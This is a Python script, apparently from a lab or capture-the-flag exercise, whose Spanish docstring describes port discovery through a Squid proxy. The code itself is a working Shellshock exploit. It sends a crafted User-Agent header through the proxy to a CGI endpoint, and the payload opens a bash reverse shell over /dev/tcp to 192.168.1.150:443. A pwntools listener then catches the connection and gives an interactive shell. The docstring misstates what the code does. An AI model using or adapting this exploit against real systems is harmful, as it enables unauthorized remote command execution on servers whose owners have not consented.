66 lines
1.2 KiB
Python
66 lines
1.2 KiB
Python
# /var/bin/env python3
|
|
"""
|
|
Script para descubrir puertos abiertos en un servidor web
|
|
a través de un proxy Squid.
|
|
"""
|
|
|
|
|
|
import requests
|
|
import signal
|
|
import sys
|
|
import threading
|
|
|
|
from pwn import *
|
|
from termcolor import colored
|
|
|
|
|
|
def signal_handler(sig, frame):
|
|
print(colored('\n\n[!] Saliendo con Ctrl+C!\n', 'red'))
|
|
sys.exit(0)
|
|
|
|
|
|
# Ctrl+C handler
|
|
signal.signal(signal.SIGINT, signal_handler)
|
|
|
|
MAIN_URL = "http://127.0.0.1/cgi-bin/status"
|
|
squid_proxy = {'http': 'http://192.168.1.150:3128'}
|
|
lport = 443
|
|
|
|
|
|
def shellshock_attack():
|
|
|
|
headers = {
|
|
"User-Agent": "() { :; }; /bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.1.150/443 0>&1'"
|
|
}
|
|
|
|
r = requests.get(
|
|
MAIN_URL, headers=headers,
|
|
proxies=squid_proxy, timeout=1
|
|
)
|
|
|
|
|
|
if __name__ == "__main__":
|
|
|
|
try:
|
|
|
|
threading.Thread(target=shellshock_attack(), args=()).start()
|
|
|
|
except Exception as e:
|
|
|
|
log.error(str(e))
|
|
|
|
shell = listen(lport, timeout=20).wait_for_connection()
|
|
|
|
if shell.sock is None:
|
|
|
|
log.failure(colored(
|
|
"\n[!] No se ha podido establecer la conexión\n", "red"
|
|
))
|
|
|
|
sys.exit(1)
|
|
|
|
else:
|
|
|
|
log.success(colored("\n[+] Conexión establecida\n", "green"))
|
|
shell.interactive()
|